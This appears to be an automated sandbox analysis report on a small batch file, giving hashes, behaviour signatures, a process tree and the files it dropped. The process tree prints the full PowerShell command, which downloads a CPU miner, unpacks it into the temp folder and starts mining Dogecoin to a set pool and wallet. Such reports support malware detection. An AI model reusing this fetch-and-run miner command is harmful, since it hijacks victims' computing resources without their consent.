b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1794s
max time network
1796s
platform
windows10-2004_x64
resource
win10v2004-20231215-de
resource tags

arch:x64arch:x86image:win10v2004-20231215-delocale:de-deos:windows10-2004-x64systemwindows
submitted
04-02-2024 11:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	3472	powershell.exe
9	3472	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3596	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3596	cpuminer-sse2.exe
3596	cpuminer-sse2.exe
3596	cpuminer-sse2.exe
3596	cpuminer-sse2.exe
3596	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3472	powershell.exe
3472	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3472	powershell.exe
Token: SeManageVolumePrivilege	5044	svchost.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2896 wrote to memory of 3472	2896	cmd.exe	84
PID 2896 wrote to memory of 3472	2896	cmd.exe	84
PID 3472 wrote to memory of 3348	3472	powershell.exe	92
PID 3472 wrote to memory of 3348	3472	powershell.exe	92
PID 3348 wrote to memory of 3596	3348	cmd.exe	94
PID 3348 wrote to memory of 3596	3348	cmd.exe	94

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3472
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3348
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3596

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:1456

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5044

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.jfm

Filesize
16KB

MD5
9a5c7f1031904c87bb83bb83add62d41

SHA1
1612f6294536c6008b5f16e79bccc467dac59d32

SHA256
f72f48dceeeb89d2485fa618454026931b1ac3130379a6b02cfd6ea5bc88e15e

SHA512
cfc84956c7a369727d93d92e515ce7cc66aff773cddad92dcad502a818bc460fff66d8d9dff363d1b95a04f5b2d2aac4ff67b8b837459a660296ed201306899b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_30p1pp5s.1dv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
794KB

MD5
877049a6b7ba88e0a5db434caf0fd9a0

SHA1
1e1126763f199285b651f5d6f724fcb200ee0e32

SHA256
d00ff02f1b530054069334c397d260e974d24d6ca151c61e2eed765c0161778f

SHA512
fd591789885f03c4562371274ad41d8cee11b1b663e354cf5115fd4bf08023ce1e9ded6181a6a6534a71aa0d34deecdb6f205d1814b66ec721f676958cf83217

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
809KB

MD5
8fd47628ce0ba12b84797f6f280a62c5

SHA1
fd852d4c9b5c2dc3f8e0f44219108360057a2891

SHA256
7215a6e34698a4887a4196b0ac77aea4c19d33b49389494015ca87064f216dd7

SHA512
396c0b4117103b21cd4a664b7296060ac4a2b2c3d9df49cc3da6285634baf6a68826447b163c3bcc39cdb0695b3e017ffbc29c1f3ef5b2ee49c67a82f2d316d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
753KB

MD5
8b9716dd3d6b17eca0ea68382fff7e60

SHA1
39c58a10af2d789910bbc6f6076424a1a3636db3

SHA256
ab3601de546ef25161fdda388207731e7a8047e76b91d7cf649f6688a2d2ebc7

SHA512
0b98312579ce613593d1092083469cbd4a8679481462d177856c7b8516c3a140d5bba5e413fb38840f18e8f22d99f7868c0555599b9056389e28d3d04ade49ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
707KB

MD5
30c9a9e6ebc79594c07b2ba566ccbbfe

SHA1
b79cce21c8869b3f77980b1adde97a67ca6bcd4d

SHA256
c48b54939977a92c4759e5ce451c4a15a00326c8d7d8a11b733965dc0d5bf06b

SHA512
eb3c893d388d15241e314d3f6607714748d10192e62e6bc10f1de6f1b3e6823d8e305f85a6595e726b9684031d2881797acffcab9d8d6370c0ac2836b4336bb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
856KB

MD5
aade7fa6706410d2a8aae9c50c98d087

SHA1
67846a68dfc1b5319f7745c6281d5834ac812582

SHA256
41863aac1fdee45dda560fd5ff62ea599b60971d89d2df2cf80a0e3f40546c35

SHA512
d2f083a8654894993321e8684ff5476e1e481202ff9d4c2fdd3b8a0dd36353d8283abeca6632fd8c868dcdb7321810552209134ffdc20b1651d4e63be65fe3a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
1.0MB

MD5
7a284a7c34481442e0d7754e2d7c6b42

SHA1
5c815ff408a4292005f54a86267b0787a25509a4

SHA256
ff6667b78e814c6c961a4cf250b62ee9bcef17186c8d4765e4071d8e267a08d8

SHA512
01864105c10f2f46b222c907d079e7c5f9e8bc8d27b3b1eb0275b7773686f4df8fbb02c57d95d7707bd0cb437a19a175eacc3d6ac81883afe51b52616c338075

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
640KB

MD5
1b7339cbcb5b756c15c05fe0cc6443f3

SHA1
abdba01c4526a9bbbb7fd3853e09bce3cbb5287d

SHA256
5fcf0fb116f77206758e3a669ec4fa52648fae431a5c2aa2d7ee69944142e019

SHA512
7661b5e8413e74432a00089b1556b2f49e268b6b5c8cefd839cbe19074bffd138c18e8078627420f4082f579a9e3f8d02b199507ae36380b5375162a4d4ba439

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
787KB

MD5
ade7e17a3b15046740caf2ce16ea8962

SHA1
5c0181b60cd56b89125c9ae3101a4126b54450de

SHA256
9d75a4150a7608d6ef60ce4982b6ce6bf0db1888fa614e3a67e7b78896243675

SHA512
2aff39a8c8607ac3bfdc128fdb39123a4ca91eb1f7a80f2e628dc368a00857f790bc1242d60619eca7886f4e94abe6a707af010d008b0f1ab66af3d706bf7c1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
704KB

MD5
d2d90d87a8c1f48fd375c3ab1f3e4376

SHA1
4897be676799552e1532648ca1f5928f6f0e5699

SHA256
e920c2bdb6e161466732098a2a423683bcca5d499c23e67e7792a1cf2718147f

SHA512
e2aadae2f82daf2cdc6d95c9216bea5562b337e671c8b1401cd556230adf65b9f1fe2d84a62ae40f0e7420b8431370692977a342898ea6f01f60bcafbca2efff

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/3472-19-0x000001F2764E0000-0x000001F2764F2000-memory.dmp

Filesize
72KB

Download
memory/3472-58-0x00007FFAFF0F0000-0x00007FFAFFBB1000-memory.dmp

Filesize
10.8MB

Download
memory/3472-20-0x000001F275820000-0x000001F27582A000-memory.dmp

Filesize
40KB

Download
memory/3472-0-0x000001F275840000-0x000001F2758C6000-memory.dmp

Filesize
536KB

Download
memory/3472-17-0x00007FFAFF0F0000-0x00007FFAFFBB1000-memory.dmp

Filesize
10.8MB

Download
memory/3472-16-0x000001F2764C0000-0x000001F2764D6000-memory.dmp

Filesize
88KB

Download
memory/3472-15-0x000001F2765D0000-0x000001F2766D4000-memory.dmp

Filesize
1.0MB

Download
memory/3472-14-0x000001F25D600000-0x000001F25D610000-memory.dmp

Filesize
64KB

Download
memory/3472-13-0x000001F25D600000-0x000001F25D610000-memory.dmp

Filesize
64KB

Download
memory/3472-12-0x00007FFAFF0F0000-0x00007FFAFFBB1000-memory.dmp

Filesize
10.8MB

Download
memory/3472-11-0x000001F2757F0000-0x000001F275812000-memory.dmp

Filesize
136KB

Download
memory/3472-10-0x000001F2757E0000-0x000001F2757F0000-memory.dmp

Filesize
64KB

Download
memory/3596-72-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3596-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3596-75-0x0000000001130000-0x00000000029E5000-memory.dmp

Filesize
24.7MB

Download
memory/3596-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3596-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3596-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3596-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3596-73-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3596-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3596-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3596-106-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3596-111-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3596-116-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3596-126-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3596-131-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3596-74-0x000000005A6D0000-0x000000005A768000-memory.dmp

Filesize
608KB

Download